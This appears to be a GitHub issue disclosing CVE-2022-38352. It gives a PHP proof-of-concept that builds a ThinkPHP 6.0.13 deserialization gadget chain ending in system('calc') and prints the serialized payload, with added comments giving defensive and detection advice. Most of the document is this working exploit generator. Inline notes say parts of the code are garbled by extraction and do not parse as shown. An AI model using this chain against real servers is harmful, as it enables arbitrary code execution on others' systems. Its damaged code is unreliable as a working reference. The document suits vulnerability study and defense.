Headline
CVE-2022-38352: There is a new exploit chain for the deserialization vulnerability of thinkphp 6.0.13 · Issue #2749 · top-think/framework
ThinkPHP v6.0.13 was discovered to contain a deserialization vulnerability via the component League\Flysystem\Cached\Storage\Psr6Cache. This vulnerability allows attackers to execute arbitrary code via a crafted payload.
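The chain can call any method of any class. In this example it reaches a call to eval, so attacker-supplied PHP code is executed and can write to a file. As with any gadget chain, it is only reachable where the application deserializes attacker-controlled data.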
<?php
// Stand-in declaration for the library class named in the advisory. It carries no library
// code: it only gives serialize() an object with this class name and these property values.
// NOTE(review): the backslash escapes in this listing look like markdown-extraction residue,
// so the code is not valid PHP exactly as shown.
namespace League\Flysystem\Cached\Storage{
class Psr6Cache{
private $pool;
protected $autosave = false;
public function \_\_construct($exp)
{
// The constructor argument becomes the nested object stored in $pool.
$this\->pool = $exp;
}
}
}
// Stand-in for think\log\Channel: it keeps the object passed to the constructor in $logger.
// $lazy is declared with a default of true, but the constructor overwrites it with false,
// so the serialized object carries lazy = false.
namespace think\log{ class Channel{ protected $logger; protected $lazy = true;
public function \_\_construct($exp)
{
$this\->logger = $exp;
$this\->lazy = false;
}
}
}
// Stand-ins for think\Request and think\App. Request::$url is set to a literal PHP snippet
// (a proof-of-concept command that launches calc), and App::$instances maps the
// think\Request key to that Request object.
// Defender note: every property value here is chosen by whoever builds the serialized string,
// which is why unserialize() must never receive request-derived data. Where deserialization
// cannot be avoided, restrict it with the allowed_classes option.
// NOTE(review): the typographic quotes are extraction damage; as shown this line does not parse.
namespace think{ class Request{ protected $url; public function __construct() { $this->url = ‘<?php system(\’calc\’); exit(); ?>’; } } class App{ protected $instances = []; public function __construct() { $this->instances = ['think\Request’=>new Request()]; } } }
// Empty stand-in for think\view\driver\Php; only the class name matters in this listing.
// NOTE(review): the issue text says the chain ends in an eval call; presumably that is the
// real class's display method, which is referenced from the Socket config. Confirm against
// the framework source.
namespace think\view\driver{ class Php{} }
// Stand-in for the think\log\driver\Socket log driver, populated with a hand-built $config,
// a think\App object and a $clientArg array.
namespace think\log\driver{
class Socket{
protected $config = \[\];
protected $app;
protected $clientArg = \[\];
public function \_\_construct()
{
$this\->config = \[
'debug'\=>true,
'force\_client\_ids' => 1,
'allow\_client\_ids' => '',
// A PHP callable in array form (object, method name) stored as plain configuration data.
// Defender note: a config value that is later invoked as a callable becomes a code-execution
// primitive once object state is attacker-controlled. Presumably the real driver invokes
// this entry; confirm against the framework source.
'format\_head' => \[new \\think\\view\\driver\\Php,'display'\], \# class and method being abused
\];
$this\->app = new \\think\\App();
$this\->clientArg = \['tabid'\=>'1'\];
}
}
}
// Builds the object graph (Socket wrapped in Channel wrapped in Psr6Cache), then prints it
// serialized and URL-encoded.
// Detection note: request data containing PHP serialized-object tokens that name these
// classes (for example Psr6Cache or think\log\Channel) is a strong indicator of an attempt
// to reach this chain, and is worth alerting on at the WAF or application log level.
namespace{ $c = new think\log\driver\Socket(); $b = new think\log\Channel($c); $a = new League\Flysystem\Cached\Storage\Psr6Cache($b); echo urlencode(serialize($a)); }